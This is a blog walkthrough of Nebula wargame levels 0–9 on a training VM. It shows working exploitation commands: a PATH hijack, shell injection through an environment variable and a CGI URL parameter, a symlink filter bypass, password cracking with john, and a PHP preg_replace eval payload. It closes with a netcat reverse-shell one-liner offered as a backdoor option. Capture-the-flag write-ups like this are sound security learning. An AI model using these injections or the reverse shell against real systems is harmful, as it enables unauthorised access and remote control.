Nebula Wargame walkthrough Level 0-9

Posted on Mo 28 September 2015 in Wargames

In this blog post we will walk through the solutions of the levels 0 to 9 of the Nebula wargame, which is hosted on http://exploit-exercises.com. This writeup will force me to memorize commands better and exercise a bit. I fear that this writeup is of no use for other people, since you hopefully want to solve those exercises on your own :)

Level 0 - Finding setuid programs in the filesystem

As the descriptions states you need to find a setuid binary that gets a shell for the flag00 user. We can find setuid executables with a command such as the following:

find / -type f -perm -4000 -user flag00 2>/dev/null

This command suppresses error messages (The 2>/dev/null part redirects error output to /dev/null). Furthermore the -perm -4000 flag is responsible for

All  of  the  permission bits mode are set for the file.  Symbolic modes are accepted in this form, and this is usually the way in which would want to use
them.  You must specify `u', `g' or `o' if you use a symbolic mode.   See the EXAMPLES section for some illustrative examples.

Now execute the found binary and run getflag and you should be done.

Level 1 - Exploiting PATH vulnerabilities

This level is also really easy. We need to trick the following code to run the program getflag with id flag01:

include <stdlib.h>
include <unistd.h>
include <string.h>
include <sys/types.h>
include <stdio.h>

int main(int argc, char **argv, char **envp) {
    gid_t gid;
    uid_t uid;
    gid = getegid();
    uid = geteuid();

    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);

    system("/usr/bin/env echo and now what?");
}

As we all now /usr/bin/env executes a program with the current environment. And the environment includes the $PATH variable that specifies where programs can be found, such that users don't need to execute the whole path.

Of course we can set the PATH variable to some folder and include a program there which is called echo.

mkdir /tmp/bin
echo -e '#!/bin/bash\necho "executing with id $(id)";\ngetflag' > /tmp/bin/echo && chmod +x /tmp/bin/echo
PATH=/tmp/bin/:$PATH

level01@nebula:/home/flag01$ ./flag01 
executing with id uid=998(flag01) gid=1002(level01) groups=998(flag01),1002(level01)
You have successfully executed getflag on a target account

Level 2 - Command Injection in setuid C programs

Level 2 is very easy. The vulnerability is a basic command injection flag. When you see the following lines in the code:

buffer = NULL;

asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
printf("about to call system(\"%s\")\n", buffer);

system(buffer);

it becomes clear how to call getflag on the target account:

level02@nebula:/home/flag02$ USER='; getflag; echo'
level02@nebula:/home/flag02$ ./flag02 
about to call system("/bin/echo ; getflag; echo is cool")

You have successfully executed getflag on a target account
is cool

I just ended the current command with ; and appended our own command and closed it again with the original echo statement.

Level 3 - Exploiting cronjobs

NOT SOLVED YET

In Level 3 we can write in the home directory and create our own executable scripts. These are executed with a cronjob script that looks like this:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
    (ulimit -t 5; bash -x "$i")
    rm -f "$i"
done

We need to consider the ulimit -t5 call that sets a user limit:

The bash -x will I simply created a small script in writeable.d and added a file test.sh with the following contents:

getflag

Level 4 - Bypassing filters with symlinks

This level requires us to read a file token in the /home/flag04 directory which we cannot access. But there is a setuid binary that runs with euid flag04 with the following code:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);
    exit(EXIT_FAILURE);
  }

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);
    exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
}

To bypass it, we simple create a symbolic link to the token file. The read() function apparently resolves symbolic links:

level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/bla
level04@nebula:/home/flag04$ ./flag04 /tmp/bla 
06508b5e-8909-4f38-b630-fdb148a848a2
level04@nebula:/home/flag04$ su flag04
Password: 
sh-4.2$ getflag
You have successfully executed getflag on a target account

Level 5 - Reading sensitive backup files to exploit accounts

When you change to the directory of flag05 you can immediately see a suspicious directory named .backup. There you'll find a tar.gz file. When you decompress and untar it, you'll see that it contains the credentials for a ssh connection. After some tries, you'll see that you may login to the flag05 account with the private key (contained in .ssh/id_rsa).

# This command creates a temporary directory and unpacks the .tgz file there. Then it logs in with the
# id_rsa key which was in the compressed tar archive.
TEMPDIR=$(mktemp -d) && tar -xzvf .backup/backup-19072011.tgz -C $TEMPDIR && ssh -i $TEMPDIR/.ssh/id_rsa flag05@localhost 'getflag'

Level 6 - Cracking crypt(3)

This one is fairly easy. As the level description states:

The flag06 account credentials came from a legacy unix system.

This just means that the hashed passwords are still stored in /etc/passwd and that they are hashed with crypt(3).

So I installed a password cracking program named john and downloaded the /etc/passwd file from nebula to my host machine.

scp level06@nebula:/etc/passwd passwd

Then I called john with the password file which yielded the password immediately:

nikolai@nikolai:~/Projects/private/wargames/exploit-exercises/nebula$ john passwd 
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (flag06)
1g 0:00:00:00 100% 2/3 11.11g/s 8366p/s 8366c/s 8366C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Well the password is hello :)

# enter the password 'hello'
ssh flag06@nebula 'getflag'
flag06@nebula's password: 
You have successfully executed getflag on a target account

Level 7 - RCE exploit in cgi files

This one is quite easy. You can immediately see that there is a cgi perl script in the flag07 directory that exposes ping.

#!/usr/bin/perl

use CGI qw{param};

print "Content-type: text/html\n\n";

sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
    foreach $line (@output) { print "$line"; }

    print("</pre></body></html>");

}

# check if Host set. if not, display normal page, etc

ping(param("Host"));

Then you can access the cgi bin over a browser and simply inject some command into the script. You need to inspect thttpd.conf config file for the httpd to see on which port the web server is listeingn (7007). Then I did the following:

http://192.168.56.101:7007/index.cgi?Host=$(getflag > /tmp/getflag)

and then you can see that getflag was executed when you open it with level07:

level07@nebula:/home/flag07$ cat /tmp/getflag 
You have successfully executed getflag on a target account

Level 8 - Reading and understanding pcap files!

This level was quite tricky and a lot of fun to solve. You can find a file named capture.pcap in the flag08 directory. Download it to your host (with scp for instance) and open the pcap file with wireshark:

wireshark -r capture.pcap

Then right click on a packet and select Follow TCP Stream. You will see something like the following:

wireshark screenshot

We can see that we captured the network streams of someone trying to loging in with username level08 and a password with some special chars in it: 0x7f. A quick lookup in a ascii table confirms that the ascii code at 0x7f is a control code for the DEL(delete) character. So the overall password is: backd00Rmate

Then you can login to flag08 with this password and execute getflag.

Level 9 - The evil /e in PHP regular expressions: e(PREG_REPLACE_EVAL)

We have a PHP script that is probably executed by the flag09 binary in /home/flag09.

The script contains the following code:

<?php

function spam($email)
{
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);

    return $email;
}

function markup($filename, $use_me)
{
    $contents = file_get_contents($filename);

    $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
    $contents = preg_replace("/\[/", "<", $contents);
    $contents = preg_replace("/\]/", ">", $contents);

    return $contents;
}

$output = markup($argv[1], $argv[2]);

print $output;

?>

This was also a very nice level. And the code has even a variable named $use_me that helps in exploiting the bug.

To exploit it, I created a file named /tmp/testfile with the below contents. Then I proceeded to call the setuid binary:

level09@nebula:/home/flag09$ cat /tmp/testfile 
[email {${eval(system($use_me))}}]

level09@nebula:/home/flag09$ ./flag09 /tmp/testfile 'getflag > /tmp/flagged'
PHP Notice:  Undefined variable:  in /home/flag09/flag09.php(15) : regexp code on line 1

level09@nebula:/home/flag09$ cat /tmp/flagged 
You have successfully executed getflag on a target account

How it works: First for the basic understanding read http://php.net/manual/en/reference.pcre.pattern.modifiers.php.

After having read it, we know that every matched group in the pattern in preg_replace() is called with the spam function. But we control what parameter is passed to spam() with the reference \2.

So we can just call a bash command through php with a function like system(). There we make use of the second parameter $use_me.

For a POC, I just redirected the contents of getflag to the file /tmp/flagged. But of course we could execute any command, like opening a backdoor shell with a $use_me parameter like: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f